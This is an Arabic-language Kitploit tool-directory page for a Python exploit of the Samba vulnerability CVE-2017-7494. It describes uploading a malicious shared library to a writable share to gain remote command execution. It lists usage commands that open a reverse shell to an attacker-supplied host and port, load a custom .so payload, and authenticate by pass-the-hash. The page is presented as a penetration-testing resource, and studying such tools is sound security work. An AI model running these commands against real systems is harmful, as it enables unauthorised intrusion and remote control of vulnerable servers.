Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
noSAMBAnoCRY-CVE-2017-7494 — CVE-2017-7494 python استغلال | Kitploit
أدوات/GitHubGitHub/0xm4ud/nosambanocry-cve-2017-7494
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداختبار الاختراقأداة الوصول عن بعد
GitHub0xm4ud/nosambanocry-cve-2017-7494

noSAMBAnoCRY-CVE-2017-7494

CVE-2017-7494 python استغلال

عرض المستودع
61منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

noSAMBAnoCRY CVE-2017-7494

استغلال عن بُعد لثغرة SAMBA CVE-2017-7494 المعروفة باسم is_know_pipename!

التفاصيل

ينقسم هذا الاستغلال إلى 3 أجزاء:

  • ترجمة evilLib للمعماريات التالية: x86_64 , x86, أو i686
  • العثور على مشاركة قابلة للكتابة ورفع evilLib إليها!
  • تحميل evilLib، إذا سار كل شيء على ما يرام، يتم تحقيق تنفيذ الأوامر عن بُعد (RCE)!

طالما أن الهدف ضعيف وأن الـ payload صحيح لنظام التشغيل والمعمارية المستهدفة، فإن الاستغلال موثوق به إلى حد كبير.

كيفية الاستخدام

شغل الاستغلال ضد هدفك وانتظر حتى تظهر الـ shell:

root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST
root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort 

بالنسبة لإصدارات Samba من 3.5.0 إلى 3.6.0، تحتاج فقط إلى إضافة الوسيط -o 1

root@kitploit:~
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1

شغل ملف .so المخصص الخاص بك

root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so

لاستخدام منفذ Samba مخصص، استخدم الوسيط -p

root@kitploit:~
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port

في حالة مواجهة تجزئات smbpasswd وعدم القدرة على كسرها، يمكنك الآن استخدام تمرير التجزئة (pass-the-hash) باستخدام الوسيط --hashes=LM:NT

root@kitploit:~
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP

إخلاء المسؤولية

هذا المستودع مستوحى من المستودع: joxeankoret/exploit-CVE-2017-7494 و Archivaldo

تنزيل الأداة